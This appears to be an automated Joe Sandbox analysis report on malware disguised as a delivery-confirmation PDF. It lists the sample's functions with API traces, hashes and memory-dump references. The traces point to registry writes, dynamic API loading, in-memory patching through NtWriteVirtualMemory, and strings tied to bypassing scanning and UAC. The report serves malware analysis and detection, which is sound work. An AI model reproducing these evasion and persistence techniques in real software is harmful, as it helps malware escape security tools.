Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: bdeaf50736ceb09bb19b732eb3b22ce89d218e3fa5cc20c362fa96457945faec
Instruction ID: 98395e242c32fa54c8dd6b7c3d1a1564835021aba3a6a4427ec389fad7d42b9e
Opcode Fuzzy Hash: bdeaf50736ceb09bb19b732eb3b22ce89d218e3fa5cc20c362fa96457945faec
Instruction Fuzzy Hash: 54F08C74640204BFEB21EFA4DC51B5A77ADEB48B00F518520B609E3A50DA74AD009F28

Function 02CE5BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CE5C10
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CE5C3E

Part of subcall function 02CD7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02CE3888,02CE5C7E,00000000,02CE5CFC,?,?,02CE3888), ref: 02CD7D66

Part of subcall function 02CD7F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02CE3888,02CE5C99,00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CD7F3F

GetLastError.KERNEL32(00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CE5CA3

Part of subcall function 02CDA700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02CDC361,00000000,02CDC3BB), ref: 02CDA71F

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: bbd1ee4b0ef15ec16eb5bc8b3b2a8a116639a996a9ca76323eeea78251e6fbfd
Instruction ID: 859100f54b1b7f82b7db33bc3e4ad387b96d549577e275ba102d83032f5175a8
Opcode Fuzzy Hash: bbd1ee4b0ef15ec16eb5bc8b3b2a8a116639a996a9ca76323eeea78251e6fbfd
Instruction Fuzzy Hash: B7316474A006449FDF10EFA4C8817AEB7F6AF48314F918569EA04E7380D7755E05DFA1

Function 02CEE6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02E25914), ref: 02CEE704
RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE73C
RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE747

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 94c932c91f4f7d03103eb99d592b33efb1667595c308f67eb0f39c0e89abdfbe
Instruction ID: 8c01958a760cce47679d61c22d153bda9433dc462f3750ec1e3bd1be2abf1cc5
Opcode Fuzzy Hash: 94c932c91f4f7d03103eb99d592b33efb1667595c308f67eb0f39c0e89abdfbe
Instruction Fuzzy Hash: 01114F71650204AFEB28EFA9D981A6E77EDEB09360F914460F705E7250D730EE81EE60

Function 02CEE6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02E25914), ref: 02CEE704
RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE73C
RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE747

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: b7c6fb7b2cc2343ce7ecb12b118b6446159cf033a9b41b76e360b04af3ad26e7
Instruction ID: b8e313629fbbbc7fe032e78423282fcdcc239aef34b7e17950aa0807d347277c
Opcode Fuzzy Hash: b7c6fb7b2cc2343ce7ecb12b118b6446159cf033a9b41b76e360b04af3ad26e7
Instruction Fuzzy Hash: 31114F71650204AFEB28EFA9D981A5E77ADEB09360F914460F705E7250D730EA81EE60

Function 02CDE2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02CDE2FB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 66c5830988838e17609a28cda1d20b917345ca845c808715f9e869f73f3e428f
Instruction ID: 4a2baf8ee2fe54fef4a01b8223119d5265d15ccad10b3717f2e6b7299650d907
Opcode Fuzzy Hash: 66c5830988838e17609a28cda1d20b917345ca845c808715f9e869f73f3e428f
Instruction Fuzzy Hash: E0F0F624B0421087C7297B3ACDC467D279AAFC1720B50142AE78F9F285CB34DD45DB62

Function 02CD4CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4D07
SysFreeString.OLEAUT32(00000000), ref: 02CD4D19

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction ID: 51c9606e5d1424fa8b8471fc813d58bb9a89eb03442c21739c94cc8a0294df62
Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction Fuzzy Hash: 72E012B81056016EFB282F619C40B37372AAFC2741B184899EB04CA155D775C441BD34

Function 02CE7064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02CE7362

Strings

H, xrefs: 02CE7119

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: be562c6836cb2c0d690ba071ca15b79a82a9299565d2065784382d42ecdf8ec1
Instruction ID: 524c59d3232b3afe600089cc40f2748f6f9ccdd71fb2db31b4e38c4c3a54176a
Opcode Fuzzy Hash: be562c6836cb2c0d690ba071ca15b79a82a9299565d2065784382d42ecdf8ec1
Instruction Fuzzy Hash: 3AB1D274A01608DFDB14CFA9D880A9DFBF6FF89314F148569E80AAB360D735A949CF50

Function 02CE8824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74

FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID:
API String ID: 3283153180-0
Opcode ID: 4a6a43a58a6e793034d91940e64e72819ea29020f60c4757524fa1418ee0cace
Instruction ID: 881f5073ff8178946e91c22c7e8132ee53f417dd98a0d4a7ab0359b64a8a25f5
Opcode Fuzzy Hash: 4a6a43a58a6e793034d91940e64e72819ea29020f60c4757524fa1418ee0cace
Instruction Fuzzy Hash: 6B118B70A40304ABEF11FBE8E806A5E77AEEB45700F5104A4B349A3B90DA34DE05EF54

Function 02CDE6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02CDE709

Part of subcall function 02CDE2EC: VariantClear.OLEAUT32(?), ref: 02CDE2FB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 63c90c08bd71b620d6c40e2d4dffbb562b64040dc96673555797db9093e7f908
Instruction ID: f671a904135e41ef792ea5efa293777e4659134abac1651fe60d256d85e7cec3
Opcode Fuzzy Hash: 63c90c08bd71b620d6c40e2d4dffbb562b64040dc96673555797db9093e7f908
Instruction Fuzzy Hash: 0211C42470031087CBA4AF29CDC466BB7DAEFC5751B169426EB4B8F355EB31CC41DAA2

Function 02CDE384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02CDE3C4

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 62fa31f31535911bbcef39f30a2638ddf77f095d1a4c4bc438c4d4d66e2774f7
Instruction ID: 02c089205e46491efbc3534d165b493d620b5575639af4d0dcc6546cd058dd8c
Opcode Fuzzy Hash: 62fa31f31535911bbcef39f30a2638ddf77f095d1a4c4bc438c4d4d66e2774f7
Instruction Fuzzy Hash: A3314D71A00209AFDB10EFA8C985ABE77E8FB4C304F444565FB09DB250D774EA51CBA2

Function 02CE6CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02CE6D41,?,?,?,00000000), ref: 02CE6D21

Part of subcall function 02CD4C0C: SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 4238f2276da9ed30d9b1bae35663567dbfe934a46700898f82246a1feece0f99
Instruction ID: f702fa829b12012b138a855c360663df63e644dd14014da889dab6cc696b818d
Opcode Fuzzy Hash: 4238f2276da9ed30d9b1bae35663567dbfe934a46700898f82246a1feece0f99
Instruction Fuzzy Hash: 8FE06531614644BBEB15EBA1CC5196E77ADEB49B10BA14471E601D3510DA74AE00EC60

Function 02CD5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CD5832

Part of subcall function 02CD5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5A94
Part of subcall function 02CD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AB2
Part of subcall function 02CD5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AD0
Part of subcall function 02CD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CD5AEE
Part of subcall function 02CD5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CD5B37
Part of subcall function 02CD5A78: RegQueryValueExA.ADVAPI32(?,02CD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001), ref: 02CD5B55
Part of subcall function 02CD5A78: RegCloseKey.ADVAPI32(?,02CD5B84,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CD5B77

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: 21111016b8971b01cdf9c8a5ade1547d5c40e5913365453846fae190ac2f0a5e
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: 06E06D71A402148FCB10DE58C8C0A5637D9AF08790F440565EE58DF34AD3B0DA108BD0

Function 02CD7D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02CD7DB0

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: f73089e79baac44defc6fb1cefc6f96633c52fee060402ee3b6c6de8d205ea59
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: C3D05B763081107AD220995A6C44EB75BDCCBC9770F100639F758C3180D7308C05C671

Function 02CD7E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02CEF8CC,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,UacInitialize), ref: 02CD7E23

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
Instruction ID: a772036f64aebbe0fa2d72a80205f25acb853b96368384ee8229dc9bceb50bf5
Opcode Fuzzy Hash: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
Instruction Fuzzy Hash: CEC08CA12022400E5A6461FC1CC400A52CC098513A3A40B79B338C6FD2E331985B7850

Function 02CD7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02CF2A49,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,Initialize), ref: 02CD7E47

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
Instruction ID: 0f1c6449ed9a11d00079be74fcd4e457882d7bb65a786c809fff159efa5d35e2
Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
Instruction Fuzzy Hash: A3C08CA02022040E9E6062FC2CC029A42CE09841343A01B61E33CD65C2E331D86B3810

Function 02CD4C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02CD4C37

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction ID: 5b3e099d89e6ce903cf892b354dcc3f20515ac56cbd60f8ec196bb6d398bf7fc
Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction Fuzzy Hash: 61C012A260062457EB355A989CC075672CCEB85295B1804A1D708D7241E3B19D005A64

Function 02CFBB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02CFBB44,00000000,00000001), ref: 02CFBB60

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

